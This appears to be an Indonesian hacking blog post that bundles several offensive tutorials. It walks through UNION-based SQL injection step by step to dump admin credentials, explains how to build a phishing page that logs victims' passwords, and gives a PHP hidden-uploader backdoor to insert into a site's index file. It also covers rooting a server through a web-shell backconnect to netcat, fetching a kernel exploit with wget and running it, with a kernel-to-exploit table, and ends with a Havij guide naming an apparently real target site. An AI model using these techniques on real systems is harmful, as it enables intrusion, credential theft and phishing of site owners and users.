Hacking


HACKING MENGGUNAKAN SQL INJECTION

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
step Satu:=
===========
carilah target ( dengan menggunakan mbah google tentu saja) :P
misal: [site]/berita.php?id=100
Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–
sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–
===========
step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–
seumpama table yang muncul adalah “admin”
===========
step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.
tables+where+table_schema=database()–
=============
step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.
columns+where+table_name=0xhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
silakan mengkonversinya di link bawah ini :
http://www.md5decrypter.co.uk/
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.
columns+where+table_name=0x61646D696E–
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
==============
[+] step Delapan:=
==============
tahap terakhir mencari halam admin atau login.

Nb. Belum nemu yang terbaru (maaf kk) )

Fake/phising tools creator

Buat teman-teman yang ingin membuat fake login. disini saya akan berbagi tools yang mudah untuk membuatnya menggunakan phish creatorV3 (windows version)
http://fadli-tn.info/blog/wp-content/uploads/2011/01/phisher_creator.JPG
cara menggunakanya :
1.jalankan phish creator DOWNLOAD DISINI
2.masukan alamat url situs yang ingin di fake
3.pilih directory tempat penyimpanan “save as” ke tempat yang anda inginkan
4.pilih create phisher
5.setelah selesai.jangan lupa anda harus membuat 1 file berformat .txt yaitu passes.txt yang nantinya untuk menyimpan password2 yang terkena jebakan fake anda.
6.lalu upload smua file ke web hosting anda.selesai
sumber : http://cyberatorium.org/showthread.php?175-Fake-phising-tools-creator

PHP hidden uploader script

menggunakan php hidden uploader , adalah cara yang baik membuat uploader agar tidak mudah diketahui oleh orang lain.caranya dengan memasukan script di bawah ini misalnya di index filenya(jangan di hapus isi script file indexnya tapi melainkan disisipin script uploadernya)
ok langsung saja copy paste script di bawah ini.




<?php if(isset($_GET['fadli-ganteng']))
{
echo "<body bgcolor=black>
<font color=green size=3>";
echo "<h2>hidden uploader</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">Filename:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo "Stored in: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
 
?>
 

Tutor Ngeroot di server target

Langkah untuk ngeroot adalah:
  1. Sediakan  pc / Laptop untuk menjalankan Netcat
  2. Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
  3. Sedikan juga shell injection tools (Locus7, c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
  4. Sediakan Netcat (NC) untuk menerima connection dari backconnect
  5. Sediakan local root exploit yang sesuai dengan kernel target
Oke, kita mulai beraksi

Asumsikan bahwa:
IPHOSTSERVER TARGET = 203.146.102.39
PORT SERVER NETCAT TARGET: 007
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 007
$ nc -n -l -v -p 007
Listening on [any] 007 …
Pastikan bahwa anda sudah melakukan upload locus7 /c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
perl backconnect.txt 203.146.102.39
 
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:
$ nc -n -l -v -p 007
Listening on [any] 007 …
Connect to [203.146.102.39] from localhost [127.0.0.1] 007
uid=48(apache) gid=48(apache) groups=48(apache)
: : W4ck1ng-shell  (private Build v0.3) Bind shell backdoor ::
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, untuk melihat versi kernelnya contoh :
$ uname -aLinux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.0 -> h00lyshit, wuftpd
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.11 ve 2.6.16 Arasi -> prctl, raptor, raptor2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.17 ve Ustlerinde -> 06 cw7.3 Jessica x x2
2.6.17 – 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
2.6.23 – 2.6.24 -> diane_lane_******_hard.c
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777
(misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Buzz, selamat anda sudah mendapatkan akses root.

Acunetix Vulnerability Scanner

Acunetix adalah sebuah software yang berfungsi untuk melakukan scanning atas kelemahan yang bisa terjadi di situs Anda. Dengan memakai software ini, anda akan mengetahui apa saja kelemahan yang terdapat di situs anda beserta dengan saran apa yang harus Anda lakukan atas kelemahan yang di temukan tersebut.
Software ini secara otomatis akan memeriksa situs Anda terhadap kelemahan, metode nya antara lain :
* Version Check : Vulnerable Web Servers, Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution, CGI Tester, Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE), Verify Web Server Technologies.
* Parameter Manipulation : Cross-Site Scripting (XSS) – over 25 different XSS variations are tested, SQL Injection, Code Execution, Directory Traversal, File Inclusion, Script Source Code Disclosure, CRLF Injection, Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, Full Path Disclosure, LDAP Injection, and Cookie Manipulation.
* And Much Other
System Requirements
· Microsoft Windows XP Professional or Home Edition, Windows 2000,
Windows Server 2003 and Windows Vista.
· 1 GB of RAM.
· 200 MB of available hard-disk space.
· Microsoft Internet Explorer 6 (or higher).
· Microsoft SQL Server / Access support – if database is enabled
(optional).

Havij SQL Injection

1.cari situs targer contoh http://www.consumerhealthreviews.org/product.php?catid=6 lalu pilih analyze ,tunggu hingga selesai.jika sudah selesai lihat seperti sreenshot disamping jika situs tersebut terdapat vuln baru kita lanjutkan ke langkah berikutnya.
untitled2
2.pilih table lalu get table untuk mencari table web tersebut ikuti sesuai urutannya
untitled3
3.setelah table keluar semua lalu jika anda ingin langsung mencari username dan password web tersebut centang kolom admin lalu get colums hasilnya akan seperti sreenshot diatas.
username : admin
password : 509445A0D46465180C35CA17CD06B8BC <– masih berupa encrypted
untitled4
4.setelah berhasil mendapatkan username dan password lalu tinggal mencari halaman adminya untuk masuk pilih find admin lihat screenshot disamping jika ketemu halaman adminya terdapat kata respone 200k
untitled5
5.yang terakhir yaitu karena password yang telah didapat masih berupa encrypted kita harus mencrack password tersebut agar terlihat password sebenarnya ,pilih md5 lihat screenshot disamping. hasil crack password :68510015 selesai.selamat mencoba. Download Havij SQL Injection V1.13

 MUngkin di mbah google sudah banyak link download, bahkan yang pro. silahkan kalian cari sendiri saja. gunakan dengan bijak ya kk.